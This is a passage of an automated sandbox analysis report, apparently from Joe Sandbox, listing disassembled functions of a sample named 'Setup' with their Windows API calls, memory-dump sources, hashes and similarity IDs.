                                                                                                                                                                    • Instruction ID: 84f1ed2b113f2e62c93cbc148f81d1645ea7e637f54ce4f960b6257e89e1f9f0
                                                                                                                                                                    • Opcode Fuzzy Hash: 9c0aad16a663e607946613f71ff52958745664ddaee1c5a51e90edd2dda81b9a
                                                                                                                                                                    • Instruction Fuzzy Hash: 62B092B05341606EEA0057209C0CF37361CEB01342F000811B806C00A4C6A04880A560
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,69DAFA6E,02602230,?,?,69DA83B3,02602230,69D6A794,02602230,69D6A794,00000000), ref: 69DA851E
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,00000000,69DAFA6E,02602230,?,?,69DA83B3,02602230,69D6A794,02602230,69D6A794), ref: 69DA853F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
• API ID: ByteCharMultiWide
• String ID:
• API String ID: 626452242-0
• Opcode ID: 96e282959a663ebf7fd7fc849800548c7bcd2231e354147737082fb4775b0018
• Instruction ID: 61f865fe91d2ba1ed746da342e19d1c844152070a898d35ae39b796b57d56c5b
• Opcode Fuzzy Hash: 96e282959a663ebf7fd7fc849800548c7bcd2231e354147737082fb4775b0018
• Instruction Fuzzy Hash: 3FF09632244164BBDB119B4ACC44E9FBB2DEB96B70F108125FE28975808A70991287B2
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D73A1D
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
  • Part of subcall function 69DA8CD5: __EH_prolog3.LIBCMT ref: 69DA8CDC
  • Part of subcall function 69DA8C7A: __EH_prolog3.LIBCMT ref: 69DA8C81
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3
• String ID:
• API String ID: 431132790-0
• Opcode ID: fa84887ca32c3a539171e8b4a9371b4b734a7587cf93d84a1c52c53d0a1193f3
• Instruction ID: f56f9462261dd75b2ca7be579bc0a78621c081b4eb28d0f08bbb79c6a49b1c4b
• Opcode Fuzzy Hash: fa84887ca32c3a539171e8b4a9371b4b734a7587cf93d84a1c52c53d0a1193f3
• Instruction Fuzzy Hash: 86717D76800249DFDB00DFA8C981BDDBBB4AF04328F148265E961BB7D1DB34DA54CB61
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D94205
  • Part of subcall function 69D82771: __EH_prolog3.LIBCMT ref: 69D82778
  • Part of subcall function 69D94F19: __EH_prolog3.LIBCMT ref: 69D94F20
  • Part of subcall function 69D92081: __EH_prolog3.LIBCMT ref: 69D92088
  • Part of subcall function 69D7C17A: _calloc.LIBCMT ref: 69D7C1A0
  • Part of subcall function 69DC78C8: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,69DB139B,?,00000010,69D85A14,?,?,?,0000004C,69DBB498,?,?,?), ref: 69DC78D3
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$ExceptionRaise_calloc
• String ID:
• API String ID: 1540488672-0
• Opcode ID: af50ba8920e610533ab511af642a30fc0e148b4df66a015f0f4cbe0ae4200060
• Instruction ID: 13a59f6c50d28929fdb49ea980950e53f3ebc3fa6ad2a282886a243762e79988
• Opcode Fuzzy Hash: af50ba8920e610533ab511af642a30fc0e148b4df66a015f0f4cbe0ae4200060
• Instruction Fuzzy Hash: D351FA75900259DFCB04CFA4C580B9ABBB4BF19308F1584B9DD59AF712C770AA49CBA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69DA7890
  • Part of subcall function 69DCC0AA: _malloc.LIBCMT ref: 69DCC0C4
  • Part of subcall function 69DAA226: GetTickCount.KERNEL32 ref: 69DAA241
  • Part of subcall function 69DAA226: GetTickCount.KERNEL32 ref: 69DAA27C
  • Part of subcall function 69DAA226: __time64.LIBCMT ref: 69DAA282
  • Part of subcall function 69DAA226: InitializeCriticalSection.KERNEL32(00000040,?,69DA7905,?), ref: 69DAA292
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: CountTick$CriticalH_prolog3InitializeSection__time64_malloc
• String ID:
• API String ID: 349597444-0
• Opcode ID: ac9a2eb8188bc34f4cb0ac1b6c5b1b041c0d5643d792a86f28c6d3b0bc402318
• Instruction ID: 9dc629a744315d121f1d0a30022498c6aea675a662c613ced90b4959ca8ee211
• Opcode Fuzzy Hash: ac9a2eb8188bc34f4cb0ac1b6c5b1b041c0d5643d792a86f28c6d3b0bc402318
• Instruction Fuzzy Hash: 84519739A00604EFDB04DF78C884A6937B5FF09324B1096B9F816DB7A1CB31E925CB61
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D859BF
  • Part of subcall function 69D856A3: SysFreeString.OLEAUT32(?), ref: 69D8578A
  • Part of subcall function 69D856A3: SysFreeString.OLEAUT32(?), ref: 69D85799
  • Part of subcall function 69D856A3: SysFreeString.OLEAUT32(?), ref: 69D857C7
  • Part of subcall function 69DB1315: __EH_prolog3.LIBCMT ref: 69DB131C
  • Part of subcall function 69DB1315: _free.LIBCMT ref: 69DB137B
  • Part of subcall function 69DAB17C: __recalloc.LIBCMT ref: 69DAB18D
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: FreeString$H_prolog3$__recalloc_free
• String ID:
• API String ID: 2446356840-0
• Opcode ID: e03db0fc3171a8ac2aea72d0a68489580483d54264c2eac6ca1ba69ebbab77f2
• Instruction ID: c980f841c656e2e3846d778d10f3cd78cc260316a4a889ddaaabd948a7611fad
• Opcode Fuzzy Hash: e03db0fc3171a8ac2aea72d0a68489580483d54264c2eac6ca1ba69ebbab77f2
• Instruction Fuzzy Hash: 405114B4901209DFCB01CFA8C58069EBBF4BF29304F1085BED45AABB41D770AA45CFA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D8A65C
  • Part of subcall function 69D8670B: __EH_prolog3.LIBCMT ref: 69D86712
  • Part of subcall function 69D86BBD: __EH_prolog3.LIBCMT ref: 69D86BC4
  • Part of subcall function 69D83B22: __EH_prolog3.LIBCMT ref: 69D83B29
  • Part of subcall function 69D89746: __EH_prolog3.LIBCMT ref: 69D8974D
  • Part of subcall function 69DC8EAB: _memcpy_s.LIBCMT ref: 69DC8EFC
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$_memcpy_s
• String ID:
• API String ID: 1663610674-0
• Opcode ID: d983a84e48d94034173d4feb31bc7ca24ea6a3abe4f6791719c4ee2bbd447ad4
• Instruction ID: 4e428d742a9fdf3d00e7a201822667f0e8f1c29dd9349f8b60fef1d2463cf3f8
• Opcode Fuzzy Hash: d983a84e48d94034173d4feb31bc7ca24ea6a3abe4f6791719c4ee2bbd447ad4
• Instruction Fuzzy Hash: C45136B5500245CFDB50CF68C581BC9BBA4AF25304F18C8B9CD99AF71AD770AA49CBB1
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69DB14D8
  • Part of subcall function 69DB3ACC: __EH_prolog3.LIBCMT ref: 69DB3AD3
  • Part of subcall function 69DB3ACC: _memcpy_s.LIBCMT ref: 69DB3B17
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$_memcpy_s
• String ID:
• API String ID: 1663610674-0
• Opcode ID: 8b83189008cbde7baf5909e010d52f7dadcd0ddde8fa5d00e3e988282c11fb33
• Instruction ID: 3cf0e948aa2d5439039dd5cde33397ab8facce64f7cc64b672f7706dfca470a5
• Opcode Fuzzy Hash: 8b83189008cbde7baf5909e010d52f7dadcd0ddde8fa5d00e3e988282c11fb33
• Instruction Fuzzy Hash: 8E4110B5A00149DFDF00DF98C884AAEBBB9FF08318F008569E9159B751CB71ED15CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 698F5E81
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LongWindow
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1378638983-0
                                                                                                                                                                    • Opcode ID: 469fe7aa1744aa9e44b02c022f2df6503c5c0bfc95dbb69aeba15cc612d9786d
                                                                                                                                                                    • Instruction ID: b52d8a47a73ba5e66c6f352d7845b0d4410093bbf8819d0b2b0bb805a3dd6692
                                                                                                                                                                    • Opcode Fuzzy Hash: 469fe7aa1744aa9e44b02c022f2df6503c5c0bfc95dbb69aeba15cc612d9786d
                                                                                                                                                                    • Instruction Fuzzy Hash: 61219C35500708AFCB20CF54C880AAEBBF5FF59390F10891EE856D7250D331E996EB91
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698E64C9
                                                                                                                                                                      • Part of subcall function 698DD349: __EH_prolog3.LIBCMT ref: 698DD350
                                                                                                                                                                      • Part of subcall function 698DD76F: __EH_prolog3.LIBCMT ref: 698DD776
                                                                                                                                                                      • Part of subcall function 698DD2B6: __EH_prolog3.LIBCMT ref: 698DD2BD
                                                                                                                                                                      • Part of subcall function 698EF5FD: __EH_prolog3.LIBCMT ref: 698EF604
                                                                                                                                                                      • Part of subcall function 698EF5FD: __recalloc.LIBCMT ref: 698EF612
                                                                                                                                                                      • Part of subcall function 698DD4C5: __EH_prolog3.LIBCMT ref: 698DD4CC
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$__recalloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1900422986-0
                                                                                                                                                                    • Opcode ID: ca5ab4296e40e7e177003e31a5311936d3ff4a90155cc684f545e3b24fbbe988
                                                                                                                                                                    • Instruction ID: c7773089927f7bf63a0fc60b7efc99856a309be0007cf2efeededc55f387e615
                                                                                                                                                                    • Opcode Fuzzy Hash: ca5ab4296e40e7e177003e31a5311936d3ff4a90155cc684f545e3b24fbbe988
                                                                                                                                                                    • Instruction Fuzzy Hash: CA2190369001189BCF00DFACC854ADEB7B4BF55358F14965DE525BB294EB34EA05CBB0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D92088
                                                                                                                                                                      • Part of subcall function 69DC78C8: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,69DB139B,?,00000010,69D85A14,?,?,?,0000004C,69DBB498,?,?,?), ref: 69DC78D3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionH_prolog3Raise
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 741760457-0
                                                                                                                                                                    • Opcode ID: 7e18a5ef39f73853f9c7f9211435a0991ae28b6ca21e46b6389723fdeacafead
                                                                                                                                                                    • Instruction ID: a00b4b5b5550fc5a7b968686879d84303d231691eb411c7220b7e73f098142a6
                                                                                                                                                                    • Opcode Fuzzy Hash: 7e18a5ef39f73853f9c7f9211435a0991ae28b6ca21e46b6389723fdeacafead
                                                                                                                                                                    • Instruction Fuzzy Hash: C62153B4A00A0ADFCB08CF29C190869BBF1FF59304B25C4ADD5499BB21D730E951CFA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 69DB66E5: __EH_prolog3.LIBCMT ref: 69DB66EC
                                                                                                                                                                      • Part of subcall function 69DB66E5: GetCommandLineW.KERNEL32(00000024,69DB36CF,00000000,?,?,?,?,69DB1338,?,00000010,69D85A14,?,?,?,0000004C,69DBB498), ref: 69DB66F3
                                                                                                                                                                      • Part of subcall function 69DB66E5: GetUserDefaultUILanguage.KERNEL32(00000738,00000000,00000000,?,?,?,69DB1338,?,00000010,69D85A14,?,?,?,0000004C,69DBB498,?), ref: 69DB672F
                                                                                                                                                                      • Part of subcall function 69DB6782: __EH_prolog3.LIBCMT ref: 69DB6789
                                                                                                                                                                      • Part of subcall function 69DB6782: CoInitialize.OLE32(00000000), ref: 69DB67DD
                                                                                                                                                                      • Part of subcall function 69DB6782: CoCreateInstance.OLE32(69D6A974,00000000,00000017,69D6A9A4,69DAFA6E,?,?,?,UiInfo.xml,?,00000000,00000044,69DB36D8,02602230,?,00000000), ref: 69DB67FB
                                                                                                                                                                    • GetUserDefaultUILanguage.KERNEL32(02602230,?,00000000,?,?,?,?,69DB1338,?,00000010,69D85A14,?,?,?,0000004C,69DBB498), ref: 69DB36D8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DefaultH_prolog3LanguageUser$CommandCreateInitializeInstanceLine
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4049621043-0
                                                                                                                                                                    • Opcode ID: 8ab22d2b6698220958cb51a0b93b663887b16d6e4bd7d48e163c789395aeaa98
                                                                                                                                                                    • Instruction ID: 981362b2ed7efcec1e528341ca0ac540069f27f61163c53238118aae6419c59d
                                                                                                                                                                    • Opcode Fuzzy Hash: 8ab22d2b6698220958cb51a0b93b663887b16d6e4bd7d48e163c789395aeaa98
                                                                                                                                                                    • Instruction Fuzzy Hash: 470108BA5016419FE314CF39C8C0C5AB395EF412B0B60C339E5B68AAD4E734D8019B61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,009A4F98,?,?,00000000,00000000,00000000,?,009A3A5D,00000001,00000214,?,009A2FA5), ref: 009A61F1
                                                                                                                                                                      • Part of subcall function 009A47E5: __getptd_noexit.LIBCMT ref: 009A47E5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4195199090.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4195128625.00000000009A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4195262631.00000000009A8000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4195338114.00000000009AA000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_9a0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocateHeap__getptd_noexit
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 328603210-0
                                                                                                                                                                    • Opcode ID: 28b1520338032190ad9779dabf6d127691416fbee7f91680a53d6413938be314
                                                                                                                                                                    • Instruction ID: 1bbd947876873cb39f1387d0dee4e0532e28bd2773f081c88de475bbdfd538eb
                                                                                                                                                                    • Opcode Fuzzy Hash: 28b1520338032190ad9779dabf6d127691416fbee7f91680a53d6413938be314
                                                                                                                                                                    • Instruction Fuzzy Hash: B00171353052159BEB289F65EC55BAA3B9CAF83764F084A29ED26CB590DB74D800C7D0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
• RtlAllocateHeap.NTDLL(00000008,?,00000000,?,698F9F86,698F91D6,?,00000000,00000000,00000000,?,698F9B8D,00000001,00000214,?,698FB575), ref: 698FD71F
  • Part of subcall function 698FB570: __getptd_noexit.LIBCMT ref: 698FB570
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: AllocateHeap__getptd_noexit
• String ID:
• API String ID: 328603210-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000008,?,00000000,?,69DCD777,69DCC0C9,?,00000000,00000000,00000000,?,69DCD37E,00000001,00000214,?,69DA831D), ref: 69DD0F1D
  • Part of subcall function 69DCBD29: __getptd_noexit.LIBCMT ref: 69DCBD29
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: AllocateHeap__getptd_noexit
• String ID:
• API String ID: 328603210-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D83B29
  • Part of subcall function 69DC78C8: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,69DB139B,?,00000010,69D85A14,?,?,?,0000004C,69DBB498,?,?,?), ref: 69DC78D3
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: ExceptionH_prolog3Raise
• String ID:
• API String ID: 741760457-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D8974D
  • Part of subcall function 69DC78C8: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,69DB139B,?,00000010,69D85A14,?,?,?,0000004C,69DBB498,?,?,?), ref: 69DC78D3
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: ExceptionH_prolog3Raise
• String ID:
• API String ID: 741760457-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3_catch
• String ID:
• API String ID: 3886170330-0
Uniqueness
Uniqueness Score: -1.00%

APIs
